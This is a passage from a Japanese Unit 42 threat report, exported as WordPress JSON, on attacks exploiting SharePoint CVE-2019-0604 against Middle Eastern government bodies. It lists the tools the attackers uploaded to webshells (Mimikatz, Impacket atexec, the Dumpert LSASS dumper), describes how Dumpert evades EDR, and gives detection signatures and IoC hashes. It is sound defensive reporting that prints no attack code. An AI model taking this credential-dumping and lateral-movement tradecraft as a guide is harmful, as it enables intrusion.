monospace;\">&lt;\u30c9\u30e1\u30a4\u30f3\u540d\u7701\u7565&gt;\/uploadedFiles\/green_post.aspx<\/span><\/p>\n<p>\u3053\u306eURL\u3067\u30db\u30b9\u30c8\u3055\u308c\u3066\u3044\u308bwebshell\u306b\u306f\u30a2\u30af\u30bb\u30b9\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u3057\u3001\u653b\u6483\u8005\u304c\u5b9f\u884c\u3057\u305f\u30b3\u30de\u30f3\u30c9\u304c\u3069\u306e\u3088\u3046\u306a\u3082\u306e\u3067\u3042\u3063\u305f\u304b\u3082\u78ba\u8a8d\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3055\u3089\u306b\u306f\u3053\u306e\u30b5\u30fc\u30d0\u30fc\u304cSharePoint\u30b5\u30fc\u30d0\u30fc\u3067\u3042\u308b\u304b\u3069\u3046\u304b\u3084\u3001webshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u305f\u3081\u306b\u8106\u5f31\u6027\u304c\u60aa\u7528\u3055\u308c\u305f\u304b\u3069\u3046\u304b\u3082\u308f\u304b\u3063\u3066\u3044\u307e\u305b\u3093\u3002\u305f\u3060\u3057Mimikatz\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u3001.NET\u3067\u8a18\u8ff0\u3055\u308c\u305f\u30ab\u30b9\u30bf\u30e0\u30ed\u30fc\u30c0\u3092\u4f7f\u7528\u3059\u308b\u7279\u7570\u306a\u3082\u306e\u3067\u3057\u305f\u3002\u3057\u305f\u304c\u3063\u3066\u3001\u4e21\u653f\u5e9c\u6a5f\u95a2\u3078\u306e\u4fb5\u5165\u306b\u306f\u3001\u540c\u3058\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304c\u95a2\u4e0e\u3057\u3066\u3044\u308b\u3082\u306e\u3068\u79c1\u305f\u3061\u306f\u8003\u3048\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u307e\u305fMimikatz\u30c4\u30fc\u30eb\u306e\u307b\u304b\u306b\u3001\u653b\u6483\u8005\u306f2\u3064\u3081\u306e\u7d44\u7e54\u306b\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u3055\u308c\u3066\u3044\u308bwebshell\u306b\u4ed6\u306e\u30c4\u30fc\u30eb\u3082\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u88682\u306b\u3053\u306ewebshell\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u3066\u3044\u305f\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u4e00\u89a7\u3092\u8a18\u8f09\u3057\u307e\u3059\u3002\u3053\u306e\u4e00\u89a7\u304b\u3089\u306f\u3001Mimikatz\u3084Impacket\u306eatexec\u30c4\u30fc\u30eb\u3092\u306f\u3058\u3081\u3001\u524d\u8ff0\u306eAntSword webshell\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u305f\u3082\u306e\u3068\u540c\u69d8\u306e\u30c4\u30fc\u30eb\u304c\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u3066\u3044\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>SHA256\u5024<\/strong><\/td>\n<td><strong>\u30d5\u30a1\u30a4\u30eb\u540d<\/strong><\/td>\n<td><strong>\u8aac\u660e<\/strong><\/td>\n<\/tr>\n<tr>\n<td>da53dcaeed..<\/td>\n<td>es.exe<\/td>\n<td>\u30ab\u30b9\u30bf\u30e0\u30ed\u30fc\u30c0\u3092\u5099\u3048\u305fMimikatz<\/td>\n<\/tr>\n<tr>\n<td>26d9212ec8..<\/td>\n<td>Rar.exe<\/td>\n<td>\u6b63\u898f\u306eWinRAR<\/td>\n<\/tr>\n<tr>\n<td>a4aca75bcc..<\/td>\n<td>atec.exe<\/td>\n<td>Impacket atexec\u30c4\u30fc\u30eb\u3092\u30b3\u30f3\u30d1\u30a4\u30eb\u3057\u305f\u3082\u306e<\/td>\n<\/tr>\n<tr>\n<td>e4e05c9a21..<\/td>\n<td>dmp.exe<\/td>\n<td>Dumpert\u30c4\u30fc\u30eb<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\"><em>\u88682 2\u3064\u3081\u306e\u653f\u5e9c\u6a5f\u95a2\u306b\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u3055\u308c\u3066\u3044\u308bwebshell\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u3066\u3044\u305f\u30c4\u30fc\u30eb<\/em><\/span><\/p>\n<p>\u88682\u306b\u793a\u3057\u305f\u30c4\u30fc\u30eb1\u3064\u306bDumpert\u30c4\u30fc\u30eb\u304c\u3042\u304c\u3063\u3066\u3044\u307e\u3059\u304c\u3001\u3053\u306e\u30c4\u30fc\u30eb\u306f<a href=\"https:\/\/github.com\/outflanknl\/Dumpert\">Outflanknl\u306eGitHub\u30ea\u30dd\u30b8\u30c8\u30ea\u304b\u3089\u7121\u6599\u3067\u5165\u624b\u53ef\u80fd<\/a>\u3067\u3059\u3002Dumpert\u306e\u4f5c\u8005\u306f\u3001\u3053\u306e\u30c4\u30fc\u30eb\u3092\u3001\u76f4\u63a5\u7684\u306a\u30b7\u30b9\u30c6\u30e0\u30b3\u30fc\u30eb\u3068API\u306e\u30a2\u30f3\u30d5\u30c3\u30af\u3092\u4f7f\u7528\u3057\u3001\u30a6\u30a4\u30eb\u30b9\u5bfe\u7b56\u30bd\u30ea\u30e5\u30fc\u30b7\u30e7\u30f3\u3084EDR\u30bd\u30ea\u30e5\u30fc\u30b7\u30e7\u30f3\u3092\u56de\u907f\u3059\u308b\u305f\u3081\u306eLSASS\u30c0\u30f3\u30d7\u30c4\u30fc\u30eb\u3068\u8aac\u660e\u3057\u3066\u3044\u307e\u3059\u3002Dumpert\u306f\u6bd4\u8f03\u7684\u65b0\u3057\u3044\u30c4\u30fc\u30eb\u3067\u3001GitHub\u3078\u306e\u6700\u521d\u306e\u30b3\u30df\u30c3\u30c8\u306f2019\u5e746\u670817\u65e5\u306b\u884c\u308f\u308c\u3066\u3044\u307e\u3059\u3002Dumpert\u30c4\u30fc\u30eb\u306f\u3001\u30ec\u30c3\u30c9\u30c1\u30fc\u30e0\u306b\u3088\u308b\u653b\u6483\u5074\u306e\u30a8\u30df\u30e5\u30ec\u30fc\u30b7\u30e7\u30f3\u652f\u63f4\u3092\u76ee\u7684\u3068\u3057\u3066\u3044\u307e\u3059\u304c\u30012019\u5e749\u670823\u65e5\u306b\u3053\u306e\u95a2\u9023webshell\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u308b\u307e\u3067\u3001\u79c1\u305f\u3061\u306f\u8105\u5a01\u653b\u6483\u8005\u304c\u3053\u306e\u30c4\u30fc\u30eb\u3092\u5229\u7528\u3057\u305f\u4f8b\u3092\u78ba\u8a8d\u3057\u305f\u3053\u3068\u304c\u3042\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u3002<\/p>\n<h2><a id=\"post-103727-conclusion\"><\/a>\u7d50\u8ad6<\/h2>\n<p>\u8105\u5a01\u653b\u6483\u8005\u306f<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-0604\">CVE-2019-0604<\/a>\u3067\u5831\u544a\u3055\u308c\u305fSharePoint\u30b5\u30fc\u30d0\u30fc\u3092\u4fb5\u5bb3\u3059\u308b\u8106\u5f31\u6027\u3092\u3044\u307e\u306a\u304a\u60aa\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u8106\u5f31\u6027\u306b\u5bfe\u3057\u3066\u306f\u3001<a href=\"https:\/\/support.microsoft.com\/en-us\/help\/4462211\/description-of-the-security-update-for-sharepoint-enterprise-server\">Microsoft\u304c2019\u5e743\u6708\u306b\u66f4\u65b0\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u30ea\u30ea\u30fc\u30b9\u3057\u3066\u3044\u307e\u3059<\/a>\u3002\u79c1\u305f\u3061\u306f\u653b\u6483\u8005\u304cSharePoint\u30b5\u30fc\u30d0\u30fc\u306bwebshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u69d8\u5b50\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u5f7c\u3089\u306f\u3053\u306ewebshell\u3092\u4f7f\u3063\u3066\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3001\u8ffd\u52a0\u306e\u30c4\u30fc\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30c4\u30fc\u30eb\u3084\u30b3\u30de\u30f3\u30c9\u3067\u3001\u8cc7\u683c\u60c5\u5831\u3092\u30c0\u30f3\u30d7\u3057\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u4e0a\u306e\u4ed6\u306e\u30b7\u30b9\u30c6\u30e0\u306b\u6a2a\u5c55\u958b\u3059\u308b\u306e\u3067\u3059\u3002\u307e\u305f\u79c1\u305f\u3061\u306f\u3001\u8105\u5a01\u653b\u6483\u8005\u30b0\u30eb\u30fc\u30d7\u306b\u3088\u308b\u30c4\u30fc\u30eb\u306e\u4f7f\u3044\u307e\u308f\u3057\u3001\u3064\u307e\u308a\u30ab\u30b9\u30bf\u30de\u30a4\u30ba\u3055\u308c\u305fMimikatz\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u4f7f\u3044\u307e\u308f\u3057\u3066\u3044\u305f\u3053\u3068\u3092\u304d\u3063\u304b\u3051\u3068\u3057\u3066\u3001\u95a2\u9023\u3059\u308bwebshell\u3082\u898b\u3064\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u3053\u306e\u30c4\u30fc\u30eb\u306e\u4f7f\u3044\u307e\u308f\u3057\u304c\u3042\u3063\u305f\u304a\u304b\u3052\u3067\u3001CVE-2019-0604\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u95a2\u9023\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u3067\u306f\u3053\u308c\u307e\u3067\u305d\u306e\u4f7f\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u306a\u304b\u3063\u305f\u8cc7\u683c\u60c5\u5831\u30c0\u30f3\u30d7\u30c4\u30fc\u30ebDumpert\u3092\u3053\u306e\u8105\u5a01\u653b\u6483\u8005\u30b0\u30eb\u30fc\u30d7\u304c\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u3044\u305f\u3053\u3068\u3082\u308f\u304b\u308a\u307e\u3057\u305f\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u304a\u5ba2\u69d8\u306f\u3001\u6b21\u306e\u65b9\u6cd5\u3067\u3053\u306e\u8105\u5a01\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li>CVE-2019-0604\u306e\u8106\u5f31\u6027\u306b\u306f\u3001Microsoft Sharepoint Remote Code Execution Vulnerability (55411) IPS\u30b7\u30b0\u30cd\u30c1\u30e3\u304c\u5bfe\u5fdc\u6e08\u307f\u3067\u3059\u3002<\/li>\n<li>Awen webshell\u306f\u3001IPS\u30b7\u30b0\u30cd\u30c1\u30e3Webshell.ASPX.git.Awen Command and Control Traffic\uff0883202\uff09\u306b\u3088\u3063\u3066\u691c\u51fa\u3055\u308c\u307e\u3059\u3002<\/li>\n<li>AntSword ASPX webshell\u306f\u3001IPS\u30b7\u30b0\u30cd\u30c1\u30e3AntSword Webshell Command and Control Traffic Detection\uff0885561\u300185562\u300185563\uff09\u306b\u3088\u3063\u3066\u691c\u51fa\u3055\u308c\u307e\u3059\u3002<\/li>\n<li>Mimikatz\u3001Impacket\u306eatexec\u3001Dumpert\u30c4\u30fc\u30eb\u306f\u3059\u3079\u3066WildFire\u306b\u3088\u308a\u30de\u30eb\u30a6\u30a7\u30a2\u3068\u5224\u5b9a\u3055\u308c\u307e\u3059\u3002<\/li>\n<\/ul>\n<h2><a id=\"post-103727-indicators-of-compromise\"><\/a>IoC<\/h2>\n<h3><a id=\"post-103727-awen-webshell\"><\/a>Awen Webshell<\/h3>\n<ul>\n<li>5d4628d4dd89f31236f8c56686925cbb1a9b4832f81c95a4300e64948afede21<\/li>\n<\/ul>\n<h3><a id=\"post-103727-antsword-webshell\"><\/a>AntSword Webshell<\/h3>\n<ul>\n<li>15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e<\/li>\n<\/ul>\n<h3><a id=\"post-103727-mimikatz\"><\/a>Mimikatz<\/h3>\n<ul>\n<li>da53dcaeede03413ba02802c4be10883c4c28d3d28dee11734f048b90eb3d304<\/li>\n<\/ul>\n<h3><a id=\"post-103727-related-tools\"><\/a>\u95a2\u9023\u30c4\u30fc\u30eb<\/h3>\n<ul>\n<li>da53dcaeede03413ba02802c4be10883c4c28d3d28dee11734f048b90eb3d304<\/li>\n<li>2836cf75fa0538b2452d77848f90b6ca48b7ff88e85d7b006924c3fc40526287<\/li>\n<li>26d9212ec8dbca45383eb95ec53c05357851bd7529fa0761d649f62e90c4e9fd<\/li>\n<li>a4aca75bcc8f18b8a2316fd67a7e545c59b871d32de0b325f56d22584038fa10<\/li>\n<li>e4e05c9a216c2f2b3925293503b5d5a892c33db2f6ea58753f032b80608c3f2e<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 \u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u8abf\u67fb\u30c1\u30fc\u30e0Uint 42\u306f\u30012019\u5e749\u670810\u65e5\u3001CVE-2019-0604\u3067\u8aac\u660e\u3055\u308c\u3066\u3044\u308bSharePoint\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3059\u308b\u672a\u77e5\u306e\u653b\u6483\u8005\u304c\u3001\u4e2d\u6771\u306e\u653f\u5e9c\u6a5f\u95a2\u306eweb\u30b5<\/p>\n","protected":false},"author":22,"featured_media":103728,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4469,4428,4470],"tags":[4935,6417,6419,6251,6420],"product_categories":[4340,4444],"coauthors":[935],"class_list":["post-103727","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerabilities","category-threat-research-ja","category-vulnerabilities-ja","tag-china-chopper-ja","tag-cve-2019-0604-ja","tag-emissary-panda-ja","tag-middle-east-ja","tag-sharepoint","product_categories-advanced-wildfire","product_categories-advanced-wildfire-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>SharePoint\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u305f\u4e2d\u6771\u653f\u5e9c\u95a2\u9023\u7d44\u7e54\u3078\u306e\u653b\u6483\u306f\u3044\u307e\u3060\u7d99\u7d9a\u4e2d<\/title>\n<meta name=\"description\" content=\"\u53bb\u5e749\u6708\u3001SharePoint\u8106\u5f31\u6027(CVE-2019-0604)\u3092\u60aa\u7528\u3059\u308b\u672a\u77e5\u306e\u653b\u6483\u8005\u304c\u4e2d\u6771\u653f\u5e9c\u6a5f\u95a2\u306eweb\u30b5\u30a4\u30c8\u306b\u8907\u6570webshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u60aa\u540d\u9ad8\u3044China Chopper\u306ewebshell\u306b\u4f3c\u305fOSS\u306eAntSword webshell\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SharePoint\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u305f\u4e2d\u6771\u653f\u5e9c\u95a2\u9023\u7d44\u7e54\u3078\u306e\u653b\u6483\u306f\u3044\u307e\u3060\u7d99\u7d9a\u4e2d\" \/>\n<meta property=\"og:description\" content=\"\u53bb\u5e749\u6708\u3001SharePoint\u8106\u5f31\u6027(CVE-2019-0604)\u3092\u60aa\u7528\u3059\u308b\u672a\u77e5\u306e\u653b\u6483\u8005\u304c\u4e2d\u6771\u653f\u5e9c\u6a5f\u95a2\u306eweb\u30b5\u30a4\u30c8\u306b\u8907\u6570webshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u60aa\u540d\u9ad8\u3044China Chopper\u306ewebshell\u306b\u4f3c\u305fOSS\u306eAntSword webshell\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2020-02-04T09:34:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-23.png\" \/>\n\t<meta property=\"og:image:width\" content=\"900\" \/>\n\t<meta property=\"og:image:height\" content=\"450\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Robert Falcone\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"SharePoint\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u305f\u4e2d\u6771\u653f\u5e9c\u95a2\u9023\u7d44\u7e54\u3078\u306e\u653b\u6483\u306f\u3044\u307e\u3060\u7d99\u7d9a\u4e2d","description":"\u53bb\u5e749\u6708\u3001SharePoint\u8106\u5f31\u6027(CVE-2019-0604)\u3092\u60aa\u7528\u3059\u308b\u672a\u77e5\u306e\u653b\u6483\u8005\u304c\u4e2d\u6771\u653f\u5e9c\u6a5f\u95a2\u306eweb\u30b5\u30a4\u30c8\u306b\u8907\u6570webshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u60aa\u540d\u9ad8\u3044China Chopper\u306ewebshell\u306b\u4f3c\u305fOSS\u306eAntSword webshell\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/","og_locale":"ja_JP","og_type":"article","og_title":"SharePoint\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u305f\u4e2d\u6771\u653f\u5e9c\u95a2\u9023\u7d44\u7e54\u3078\u306e\u653b\u6483\u306f\u3044\u307e\u3060\u7d99\u7d9a\u4e2d","og_description":"\u53bb\u5e749\u6708\u3001SharePoint\u8106\u5f31\u6027(CVE-2019-0604)\u3092\u60aa\u7528\u3059\u308b\u672a\u77e5\u306e\u653b\u6483\u8005\u304c\u4e2d\u6771\u653f\u5e9c\u6a5f\u95a2\u306eweb\u30b5\u30a4\u30c8\u306b\u8907\u6570webshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u60aa\u540d\u9ad8\u3044China Chopper\u306ewebshell\u306b\u4f3c\u305fOSS\u306eAntSword webshell\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/","og_site_name":"Unit 42","article_published_time":"2020-02-04T09:34:04+00:00","og_image":[{"width":900,"height":450,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-23.png","type":"image\/png"}],"author":"Robert Falcone","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/"},"author":{"name":"Robert Falcone","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/99e613cb620722a191a363182abe6fb1"},"headline":"SharePoint\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u305f\u4e2d\u6771\u653f\u5e9c\u95a2\u9023\u7d44\u7e54\u3078\u306e\u653b\u6483\u306f\u3044\u307e\u3060\u7d99\u7d9a\u4e2d","datePublished":"2020-02-04T09:34:04+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/"},"wordCount":915,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-23.png","keywords":["China Chopper","CVE-2019-0604","Emissary Panda","Middle East","SharePoint"],"articleSection":["Vulnerabilities","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1","\u8106\u5f31\u6027"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/","name":"SharePoint\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u305f\u4e2d\u6771\u653f\u5e9c\u95a2\u9023\u7d44\u7e54\u3078\u306e\u653b\u6483\u306f\u3044\u307e\u3060\u7d99\u7d9a\u4e2d","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-23.png","datePublished":"2020-02-04T09:34:04+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/99e613cb620722a191a363182abe6fb1"},"description":"\u53bb\u5e749\u6708\u3001SharePoint\u8106\u5f31\u6027(CVE-2019-0604)\u3092\u60aa\u7528\u3059\u308b\u672a\u77e5\u306e\u653b\u6483\u8005\u304c\u4e2d\u6771\u653f\u5e9c\u6a5f\u95a2\u306eweb\u30b5\u30a4\u30c8\u306b\u8907\u6570webshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u60aa\u540d\u9ad8\u3044China Chopper\u306ewebshell\u306b\u4f3c\u305fOSS\u306eAntSword webshell\u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-23.png","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-23.png","width":900,"height":450},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"SharePoint\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u305f\u4e2d\u6771\u653f\u5e9c\u95a2\u9023\u7d44\u7e54\u3078\u306e\u653b\u6483\u306f\u3044\u307e\u3060\u7d99\u7d9a\u4e2d"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/99e613cb620722a191a363182abe6fb1","name":"Robert Falcone","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Robert Falcone"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/author\/robertfalcone\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/103727","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/22"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=103727"}],"version-history":[{"count":3,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/103727\/revisions"}],"predecessor-version":[{"id":103778,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/103727\/revisions\/103778"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/103728"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=103727"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=103727"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=103727"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=103727"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=103727"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}